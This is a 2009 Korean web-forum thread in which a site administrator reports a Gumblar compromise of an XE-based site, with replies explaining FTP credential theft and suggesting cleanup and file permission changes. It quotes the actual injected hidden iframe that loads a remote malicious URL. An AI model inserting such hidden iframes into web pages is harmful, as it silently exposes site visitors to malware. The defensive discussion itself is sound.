묻고답하기
xe 의심각한 보안취약?
2009.07.24 02:19
아래에도 어떤 분(디따마니님)이 글 올리셨습니다만은..
사실 저도 좀전에 관리하는 사이트가 동일한 증상을 보여서 애좀 먹었거든요..
아시는분은 아실겁니다.. 주위에도 여럿 당했더라고요
오늘 갑자기 사이트가 안열리길래 어? 왜이러지? 하면서 이것저것 소스도 보고 해봐도 아무런 문제가 없는데
왜 안됄까.. 하다가 호스팅업체에 문의도해보고 다 해봐도 모르겠더라고요..
그러다가 계속 찾아본결과(인터넷검색) 알게되었습니다..
바로..
인덱스파일이나 메인파일 끝에
<iframe src="./http://u1j.in:8080/ts/in.cgi?pepsi109" width=125 height=125 style="visibility: hidden"></iframe>
위와 같은 소스를 집어넣는 별 희한한 경우인데요 보통 소스 끝에는 8080이 들어가구..
사이트가 한마디로 난리가 나버리는거죠.. 성인사이트가 열리기도 하고...
저는 지금껏 이런일들을 남의일로만 생각했는데 직접 당해보니 정말 황당하더군요.
손댄적도 없는데 수백개의 파일에 저코드가 들어가버렸으니.. 정말 어이가 없더라고요..
몇시간 사투끝에(사실 노가다였죠 ㅡ,.ㅡ) 겨우겨우 어느정도 복구는했습니만은
아직도 문제가 많습니다.. 최근에 백업을 안해놔서리..
아랫분도 말씀하신것처럼 xe에 보안상에 취약점이 있어서 그런다고 하는데..
정말 그런걸까요? 저는 cafe24측에 문제가 있는것 같던데 그쪽에서는 아니라고 하고..
혹시 퍼미션 문제일까요? 아니면내 컴퓨터가 해킹당한걸까요?
일단 ftp비밀번호는 바꿨습니다.. 호스팅업체에서 그렇게 하라고 하더라고요
정말 또 당할까봐 정말 두렵네요.. -_-;
댓글 3
-
소리없이
2009.07.24 04:37
-
LunikFX
2009.08.06 03:59
-
걸려봤어요
2009.08.07 16:58
예, 해킹 맞습니다.
검블러(Gumblar), 일명 제노바이러스입니다.
제가운영하는 사이트 두 곳이(테크노트1, Zbxe1) 뚤렸습니다.
감염경로는 먼저 님의 로컬PC가 감염되고 로컬PC에 저장된 FTP 계정의 아이디와 패스워드가 고스란히 공격자에게 넘어간 후 님의 사이트 변조가 일어납니다. 금년에 출현하여 현재 급속도로 번지고 있다고 합니다.
cgi?pepsi 로 검색해보면 감염된 사이트 수두룩하게 노출되어 나옵니다.
백신이 안깔려 있다면 클릭하지는 마세요. 피씨 바로 감염됩니다.
님의 사이트에 악성코드가 심어지면 님의 사이트는 바이러스 유포지가 되며 방문자는 리다이렉트 방식으로 바이러스에 감염되게 됩니다.
깨끗이 청소하고 FTP 비번 변경하세요
제가 관리하고있는 호스팅이 여럿있는데요 제가 똑같은 경우를 당했는데요 제껏중에 xe 는 이런일이 아직 안일어낫구요 다른 zencart 으론 프로그램으로 만든 사이트에 이런 현상이 이러나더군요. 단지 xe 버젼뿐만이 아닌것 같습니다. 그 프로그램도 똑같이 맨 밑부분에 그런 문구과 되어있구요 접속할때마다 그 사이트로 접속이 되더군요. 해킹이라고 하던데요. 그래서 그 프로그램 유저분들을 통해 들어서 폴더 퍼미션 옵션을 다 바꿨습니다. 제 경우에는 폴더퍼미션은 755 로 하구요 파일 퍼미션들은 644 로 했습니다. 그쪽에서는 그렇게 하라고 하더군요 . 그랬더니 다시 이런 현상은 아직 일어나지 않았습니다. 단지 폴더를 하나하나 다 열어서 저는 main 이나 index 나 home 이란 이란 글자가 들어가는 파일 이름들은 죄다 밑에 이런 아이프레임이 들어있더군요. 그 폴더밑 을 다 지웠습니다.